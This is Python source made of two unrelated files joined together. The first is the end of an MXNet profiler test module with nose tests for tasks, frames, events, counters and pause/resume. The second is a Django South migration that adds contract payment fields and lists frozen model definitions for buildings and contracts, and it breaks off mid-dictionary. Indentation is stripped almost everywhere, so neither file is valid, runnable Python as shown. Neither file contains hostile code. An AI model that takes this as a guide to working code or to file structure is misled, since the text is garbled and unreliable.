print("Domain created: {}".format(str(domain)))
profiler.dump()
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_task():
def makeParams():
objects = tuple('foo' for _ in range(50))
template = ''.join('{%d}' % i for i in range(len(objects)))
return template, objects
def doLog():
template, objects = makeParams()
for _ in range(100000):
logging.info(template.format(*objects))
logging.basicConfig()
enable_profiler('test_profile_task.json')
python_domain = profiler.Domain('PythonDomain::test_profile_task')
task = profiler.Task(python_domain, "test_profile_task")
task.start()
start = time.time()
var = mx.nd.ones((1000, 500))
doLog()
var.asnumpy()
stop = time.time()
task.stop()
print('run took: %.3f' % (stop - start))
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_frame():
def makeParams():
objects = tuple('foo' for _ in range(50))
template = ''.join('{%d}' % i for i in range(len(objects)))
return template, objects
def doLog():
template, objects = makeParams()
for _ in range(100000):
logging.info(template.format(*objects))
logging.basicConfig()
enable_profiler('test_profile_frame.json')
python_domain = profiler.Domain('PythonDomain::test_profile_frame')
frame = profiler.Frame(python_domain, "test_profile_frame")
frame.start()
start = time.time()
var = mx.nd.ones((1000, 500))
doLog()
var.asnumpy()
stop = time.time()
frame.stop()
print('run took: %.3f' % (stop - start))
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_event(do_enable_profiler=True):
def makeParams():
objects = tuple('foo' for _ in range(50))
template = ''.join('{%d}' % i for i in range(len(objects)))
return template, objects
def doLog():
template, objects = makeParams()
for _ in range(100000):
logging.info(template.format(*objects))
logging.basicConfig()
if do_enable_profiler is True:
enable_profiler('test_profile_event.json')
event = profiler.Event("test_profile_event")
event.start()
start = time.time()
var = mx.nd.ones((1000, 500))
doLog()
var.asnumpy()
stop = time.time()
event.stop()
print('run took: %.3f' % (stop - start))
if do_enable_profiler is True:
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_tune_pause_resume():
enable_profiler('test_profile_tune_pause_resume.json')
profiler.pause()
# "test_profile_task" should *not* show up in tuning analysis
test_profile_task()
profiler.resume()
# "test_profile_event" should show up in tuning analysis
test_profile_event()
profiler.pause()
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_profile_counter(do_enable_profiler=True):
def makeParams():
objects = tuple('foo' for _ in range(50))
template = ''.join('{%d}' % i for i in range(len(objects)))
return template, objects
def doLog(counter):
template, objects = makeParams()
range_size = 100000
for i in range(range_size):
if i <= range_size / 2:
counter += 1
else:
counter -= 1
logging.info(template.format(*objects))
if do_enable_profiler is True:
enable_profiler('test_profile_counter.json')
python_domain = profiler.Domain('PythonDomain::test_profile_counter')
counter = profiler.Counter(python_domain, "PythonCounter::test_profile_counter")
counter.set_value(5)
counter += 1
start = time.time()
doLog(counter)
stop = time.time()
print('run took: %.3f' % (stop - start))
if do_enable_profiler is True:
profiler.set_state('stop')
@with_setup(check_if_supported)
def test_continuous_profile_and_instant_marker():
file_name = 'test_continuous_profile_and_instant_marker.json'
enable_profiler(file_name, True, True, True)
python_domain = profiler.Domain('PythonDomain::test_continuous_profile')
last_file_size = 0
for i in range(5):
profiler.Marker(python_domain, "StartIteration-" + str(i)).mark('process')
print("{}...".format(i))
test_profile_event(False)
test_profile_counter(False)
profiler.dump(False)
# File size should keep increasing
new_file_size = os.path.getsize(file_name)
assert new_file_size >= last_file_size
last_file_size = new_file_size
profiler.dump(False)
debug_str = profiler.dumps()
    assert len(debug_str) > 0
print(debug_str)
profiler.set_state('stop')
if __name__ == '__main__':
import nose
nose.runmodule()
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Contract.summ_mo_money'
db.add_column(u'build_contract', 'summ_mo_money',
self.gf('django.db.models.fields.IntegerField')(null=True, blank=True),
keep_default=False)
# Adding field 'Contract.summ_without_mo_money'
db.add_column(u'build_contract', 'summ_without_mo_money',
self.gf('django.db.models.fields.IntegerField')(null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Contract.summ_mo_money'
db.delete_column(u'build_contract', 'summ_mo_money')
# Deleting field 'Contract.summ_without_mo_money'
db.delete_column(u'build_contract', 'summ_without_mo_money')
models = {
'build.building': {
'Meta': {'object_name': 'Building'},
'address': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'approve_status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'area': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'area_cmp': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'cad_num': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2048', 'db_index': 'True'}),
'cad_passport': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'clinic': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'complete_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contract': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['build.Contract']", 'null': 'True', 'blank': 'True'}),
'developer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Developer']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'driveways': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'electric_supply': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'entrance_door': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2018, 12, 31, 0, 0)'}),
'flat_num': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'flats_amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'floors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'gas_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'hallway': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Hallway']", 'null': 'True', 'blank': 'True'}),
'heating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'hot_water_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_doors': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'is_balcony': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_clother_drying': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_dustbin_area': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_heat_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_intercom': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_loggia': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_parking': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_playground': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_routes': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_water_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'kindergarden': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'kitchen': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Kitchen']", 'null': 'True', 'blank': 'True'}),
'market': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']"}),
'offer': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'payment_perspective': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'permission': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'public_transport': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'readiness': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Room']", 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2013, 1, 1, 0, 0)'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'water_removal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_settlement': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wc': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.WC']", 'null': 'True', 'blank': 'True'}),
'window_constructions': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'build.contract': {
'Meta': {'object_name': 'Contract'},
'area': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'area_cmp': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'budget': ('django.db.models.fields.IntegerField', [], {'max_length': '1024', 'null': 'True'}),
'clinic': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'creation_form': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'developer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Developer']", 'null': 'True', 'blank': 'True'}),
'docs': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['build.ContractDocuments']", 'null': 'True', 'blank': 'True'}),
'driveways': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'electric_supply': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'entrance_door': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2018, 12, 31, 0, 0)'}),
'flats_amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'floors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'gas_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'hallway': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Hallway']", 'null': 'True', 'blank': 'True'}),
'has_trouble_docs': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'hot_water_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_doors': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'is_balcony': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_clother_drying': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_dustbin_area': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_heat_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_intercom': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_loggia': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_parking': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_playground': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_routes': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_water_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'kindergarden': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'kitchen': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Kitchen']", 'null': 'True', 'blank': 'True'}),
'market': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'num': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'period_of_payment': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'public_transport': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Room']", 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2013, 1, 1, 0, 0)'}),
'summ_mo_money': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'summ_without_mo_money': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'summa': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_removal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_settlement': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wc': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.WC']", 'null': 'True', 'blank': 'True'}),
'window_constructions': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'build.contractdocuments': {
'Meta': {'object_name': 'ContractDocuments'},
'acceptance_acts': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'approval_citizen_statement': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'building_permissions': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'cost_infos': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'facility_permission': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'hiring_contract': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'land_right_stating': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'mo_certificate': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'mo_notice_to_citizen': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'mun_act_to_fond': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'mun_contracts': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'photos': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'protocols': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'tec_passport_tec_plan': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'transmission_acts': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'build.copybuilding': {
'Meta': {'object_name': 'CopyBuilding'},
'address': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'approve_status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'area': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'area_cmp': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'cad_num': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'cad_passport': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'clinic': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'complete_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contract': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['build.Contract']", 'null': 'True'}),
'developer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Developer']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'driveways': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'electric_supply': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'entrance_door': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2018, 12, 31, 0, 0)'}),
'flat_num': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'flats_amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'floors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'gas_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'hallway': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Hallway']", 'null': 'True', 'blank': 'True'}),
'heating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'hot_water_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_doors': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'is_balcony': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_clother_drying': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_dustbin_area': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_heat_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_intercom': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_loggia': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_parking': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_playground': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_routes': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_water_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'kindergarden': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'kitchen': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Kitchen']", 'null': 'True', 'blank': 'True'}),
'market': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']", 'null': 'True', 'blank': 'True'}),
'offer': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'payment_perspective': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'permission': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'public_transport': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'readiness': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Room']", 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2013, 1, 1, 0, 0)'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'water_removal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_settlement': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wc': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.WC']", 'null': 'True', 'blank': 'True'}),
'window_constructions': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'build.ground': {
'Meta': {'object_name': 'Ground'},
'address': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'approve_status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'area': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'area_cmp': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'cad_num': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2048', 'db_index': 'True'}),
'cad_passport': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'clinic': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'complete_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contract': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['build.Contract']", 'null': 'True', 'blank': 'True'}),
'developer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Developer']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'driveways': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'electric_supply': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'entrance_door': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'finish_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2018, 12, 31, 0, 0)'}),
'flats_amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'floors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'gas_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'hallway': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Hallway']", 'null': 'True', 'blank': 'True'}),
'heating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'hot_water_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_doors': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'is_balcony': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_clother_drying': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_dustbin_area': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_heat_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_intercom': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_loggia': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_parking': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_playground': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_routes': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_water_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'kindergarden': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'kitchen': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Kitchen']", 'null': 'True', 'blank': 'True'}),
'market': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']"}),
'offer': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'payment_perspective': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'permission': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'public_transport': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'readiness': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Room']", 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2013, 1, 1, 0, 0)'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'water_removal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_settlement': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wc': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.WC']", 'null': 'True', 'blank': 'True'}),
'window_constructions': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'core.basehallway': {
'Meta': {'object_name': 'BaseHallway'},
'ceiling_hook': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heaters': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lamp': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'smoke_filter': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sockets': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'switches': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'core.basekitchen': {
'Meta': {'object_name': 'BaseKitchen'},
'ceiling_hook': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heaters': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lamp': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sink_with_mixer': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'smoke_filter': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sockets': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'switches': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'core.baseroom': {
'Meta': {'object_name': 'BaseRoom'},
'ceiling_hook': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heaters': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lamp': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'smoke_filter': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sockets': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'switches': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'core.basewc': {
'Meta': {'object_name': 'BaseWC'},
'bath_with_mixer': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'ceiling_hook': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heaters': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_toilet': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_tower_dryer': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'lamp': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sink_with_mixer': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'smoke_filter': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sockets': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'switches': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'core.developer': {
'Meta': {'object_name': 'Developer'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'boss_position': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'face_list': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'})
},
u'core.hallway': {
